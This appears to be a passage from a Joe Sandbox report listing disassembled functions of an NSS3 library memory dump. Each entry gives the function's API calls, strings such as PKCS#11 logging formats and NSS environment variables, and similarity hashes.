Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser$nkl
API String ID: 1003633598-430201964
Opcode ID: dca4704178edf998657e9363e881c05ac3142bd160cfed2235667fbc6ae53ebf
Instruction ID: c2211c522cbb3c9d9187596768b6b51e506a8018b18c5ba90cd9e65efa665200
Opcode Fuzzy Hash: dca4704178edf998657e9363e881c05ac3142bd160cfed2235667fbc6ae53ebf
Instruction Fuzzy Hash: FA41C7B2701245EFDB00EF54DD48E8A3BB1EB8731EF454029E4096B612DF30E918CB9A

Function 6C5E4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5E4C4C
EnterCriticalSection.KERNEL32(?), ref: 6C5E4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4DB7

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

TlsGetValue.KERNEL32 ref: 6C5E4DD7
EnterCriticalSection.KERNEL32(?), ref: 6C5E4DEC
PR_Unlock.NSS3(?), ref: 6C5E4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C5E4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5E4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C5E4E71
free.MOZGLUE(00000000), ref: 6C5E4E7A
PR_Unlock.NSS3(?), ref: 6C5E4EA2
TlsGetValue.KERNEL32 ref: 6C5E4EC1
EnterCriticalSection.KERNEL32(?), ref: 6C5E4ED6
PR_Unlock.NSS3(?), ref: 6C5E4F01
free.MOZGLUE(00000000), ref: 6C5E4F2A

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 92438d9393aaf0834545f3635c592dd848b0efc1fde1ce19b445d1d08fa93fd9
Instruction ID: 23b2a1aa749336703b7be8e11f4d347e4b5930b3a1cc8b0115c21282957ed84e
Opcode Fuzzy Hash: 92438d9393aaf0834545f3635c592dd848b0efc1fde1ce19b445d1d08fa93fd9
Instruction Fuzzy Hash: 69B1F675E00205AFDB00EFA8DC84B9A77B4BF49318F048568ED1597B01EB35E964CBD6

Function 6C5EFFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5EFFB4

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5EFFC6

Part of subcall function 6C6698D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C669946
Part of subcall function 6C6698D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5216B7,00000000), ref: 6C66994E
Part of subcall function 6C6698D0: free.MOZGLUE(00000000), ref: 6C66995E

PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5EFFD6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5EFFE6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5EFFF6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0006
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0016
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0026
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0036
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0046
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0056
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0066
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0076
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0086
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F0096
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F00A6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F00B6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F00C6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F00D6
PR_NewLock.NSS3(?,?,6C5E76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C5F00E6

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
String ID:
API String ID: 1407103528-0
Opcode ID: d3c4cc3263f79a49110e33dc5da244f50ab6049dfa2683c0adc53979b8cd1450
Instruction ID: 4e7a207cfb36058d3db41db875784f3afade28a3824e94a78440e4ad0bec6ba5
Opcode Fuzzy Hash: d3c4cc3263f79a49110e33dc5da244f50ab6049dfa2683c0adc53979b8cd1450
Instruction Fuzzy Hash: DE3104F2F016149E8B49DF26C1481497AB4B717A4C710553FF52486B01DFB4094ECF9E

Function 6C636E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C636BF7), ref: 6C636EB6

Part of subcall function 6C591240: TlsGetValue.KERNEL32(00000040,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591267
Part of subcall function 6C591240: EnterCriticalSection.KERNEL32(?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C59127C
Part of subcall function 6C591240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591291
Part of subcall function 6C591240: PR_Unlock.NSS3(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C5912A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C6DFC0A,6C636BF7), ref: 6C636ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C636EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C636EFC
PR_NewLock.NSS3 ref: 6C636F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C636F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C636BF7), ref: 6C636F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C636BF7), ref: 6C636F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C636BF7), ref: 6C636FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C636BF7), ref: 6C636FFD

Strings

NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C636F4F
SSLFORCELOCKS, xrefs: 6C636F2B
SSLKEYLOGFILE, xrefs: 6C636EB1
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C636FDB
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C636FF8
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C636EF7

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 500a9b7ae45aa8e1a8f0dac9ad18e1841f254c8e3aa7e7c89e125e6322ba4661
Instruction ID: bc79332220adbea6e5a519aa2c6be52af37f4219041b02789564e29cb1521ebb
Opcode Fuzzy Hash: 500a9b7ae45aa8e1a8f0dac9ad18e1841f254c8e3aa7e7c89e125e6322ba4661
Instruction Fuzzy Hash: 8FA115B2B5A8A0C6F7105A3CCE0179432A2AB93339F187379E9398AED5DB35D440C759

Function 6C5B5DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B5DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C5B5E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6C5B5E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6C5B5E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C5B5EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C5B5ED9
SECKEY_SignatureLen.NSS3(?), ref: 6C5B5F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C5B5F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C5B5F89
free.MOZGLUE(?), ref: 6C5B5FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5B5FB6
free.MOZGLUE(00000000), ref: 6C5B5FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5B600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5B6079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5B6084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5B6094

Strings

, xrefs: 6C5B5EEB

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: 26234be340a298ed06dd35095bb36c56fabcf458286f65402857b210d1f16b0c
Instruction ID: 902e296f1f829f52ac7d9b6d401ff8c9f0adff4ea6eda742be166e58dff9f957
Opcode Fuzzy Hash: 26234be340a298ed06dd35095bb36c56fabcf458286f65402857b210d1f16b0c
Instruction Fuzzy Hash: 7F8114B1E002059BDB08CF64CCA1B9EBBB5AF44318F544568F819B7B81EB31E814CBE1

Function 6C5D4E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C5D4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D4EC7

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C5D4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C5D4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C5D4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C5D4F68

Strings

hObject = 0x%x, xrefs: 6C5D4EF5, 6C5D4F05
C_GetAttributeValue, xrefs: 6C5D4E7E
ulCount = %d, xrefs: 6C5D4F63
hSession = 0x%x, xrefs: 6C5D4EA2, 6C5D4EB2
nkl, xrefs: 6C5D4F82, 6C5D4FB2
(CK_INVALID_HANDLE), xrefs: 6C5D4EC0, 6C5D4F13
pTemplate = 0x%p, xrefs: 6C5D4F4A

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$nkl
API String ID: 1003633598-4210825395
Opcode ID: 36ba9cf81d81f080d8d1754ee0fbab97cff5daa6bf78f93137c40c5ca8065046
Instruction ID: 20ba92eb7ac038eb6b2f15d743e484a1aedc1c66d75e7466aa39c21e181d6dc1
Opcode Fuzzy Hash: 36ba9cf81d81f080d8d1754ee0fbab97cff5daa6bf78f93137c40c5ca8065046
Instruction Fuzzy Hash: 474181B1701245ABDB009F58DD48F9A7BB5EB82319F058438E50867B12DF34AD58CBAF

Function 6C5D4CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C5D4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D4D37

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C5D4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C5D4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C5D4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C5D4E20

Strings

hObject = 0x%x, xrefs: 6C5D4D65, 6C5D4D75
hSession = 0x%x, xrefs: 6C5D4D12, 6C5D4D22
*pulSize = 0x%x, xrefs: 6C5D4E1B
nkl, xrefs: 6C5D4DD4, 6C5D4DFF
C_GetObjectSize, xrefs: 6C5D4CEE
(CK_INVALID_HANDLE), xrefs: 6C5D4D30, 6C5D4D83
pulSize = 0x%p, xrefs: 6C5D4DB7

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nkl
API String ID: 1003633598-4019795898
Opcode ID: 8abd7f528f8c978325d8e38266522baee2de9e59312d46e6d66a2ad4b7927512
Instruction ID: 6d3d8d2bf450d54df446b981c88ff375640d751f482ae3e9ec1411ea096502a5
Opcode Fuzzy Hash: 8abd7f528f8c978325d8e38266522baee2de9e59312d46e6d66a2ad4b7927512
Instruction Fuzzy Hash: BD41C3B1701244EFDB00AF58DD88B6A3B75EB8235DF054439E508AB612DF30AD58CB9E

Function 6C5D7C90 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6C5D7CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D7CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D7CF3

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D7D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C5D7D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C5D7D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C5D7D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C5D7D77

Strings

C_Verify, xrefs: 6C5D7CB1
ulSignatureLen = %d, xrefs: 6C5D7D72
hSession = 0x%x, xrefs: 6C5D7CCE, 6C5D7CDE
ulDataLen = %d, xrefs: 6C5D7D40
pData = 0x%p, xrefs: 6C5D7D25
nkl, xrefs: 6C5D7D8F, 6C5D7DC3
(CK_INVALID_HANDLE), xrefs: 6C5D7CEC
pSignature = 0x%p, xrefs: 6C5D7D59

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify$nkl
API String ID: 1003633598-251754603
Opcode ID: bcd7e4e5db3fe66d73dad8269af0b475bdb9e00ab2cf1a5c9e6c3853998515a4
Instruction ID: 0eb3ec0ebf7091930c8ef2171c6e4667b8afc6be9395a778be7a18cf4533617f
Opcode Fuzzy Hash: bcd7e4e5db3fe66d73dad8269af0b475bdb9e00ab2cf1a5c9e6c3853998515a4
Instruction Fuzzy Hash: 2631D6B1701245EFDB00EF58DD48F6A3BB1EB82359F494078E40867612DF30A958CBAA

Function 6C5D2F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C5D2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D2F63

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C5D2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C5D2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C5D2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C5D2FE7

Strings

pOldPin = 0x%p, xrefs: 6C5D2F95
pNewPin = 0x%p, xrefs: 6C5D2FC9
ulOldLen = %d, xrefs: 6C5D2FB0
hSession = 0x%x, xrefs: 6C5D2F3E, 6C5D2F4E
nkl, xrefs: 6C5D2FFF, 6C5D3030
C_SetPIN, xrefs: 6C5D2F21
ulNewLen = %d, xrefs: 6C5D2FE2
(CK_INVALID_HANDLE), xrefs: 6C5D2F5C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$nkl
API String ID: 1003633598-314763541
Opcode ID: 7f457a18cd7a2c3f63004ed3d3c00a008df6dd90fbd78013080ad2767d7ca5a3
Instruction ID: 35954c27534d353303263579041c312b1e1c017bdf580e1093035dfce5e0d6a5
Opcode Fuzzy Hash: 7f457a18cd7a2c3f63004ed3d3c00a008df6dd90fbd78013080ad2767d7ca5a3
Instruction Fuzzy Hash: 3F31C5B6701245EBDB00DF58DD4DE4A3B71EB86359F054428E408A7612DF30ED58CB9B

Function 6C6B9C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6C6B9C70
PR_NewLock.NSS3 ref: 6C6B9C85

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PR_NewCondVar.NSS3(00000000), ref: 6C6B9C96

Part of subcall function 6C58BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C5921BC), ref: 6C58BB8C

PR_NewLock.NSS3 ref: 6C6B9CA9

Part of subcall function 6C6698D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C669946
Part of subcall function 6C6698D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5216B7,00000000), ref: 6C66994E
Part of subcall function 6C6698D0: free.MOZGLUE(00000000), ref: 6C66995E

PR_NewLock.NSS3 ref: 6C6B9CB9
PR_NewLock.NSS3 ref: 6C6B9CC9
PR_NewCondVar.NSS3(00000000), ref: 6C6B9CDA

Part of subcall function 6C58BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C58BBEB
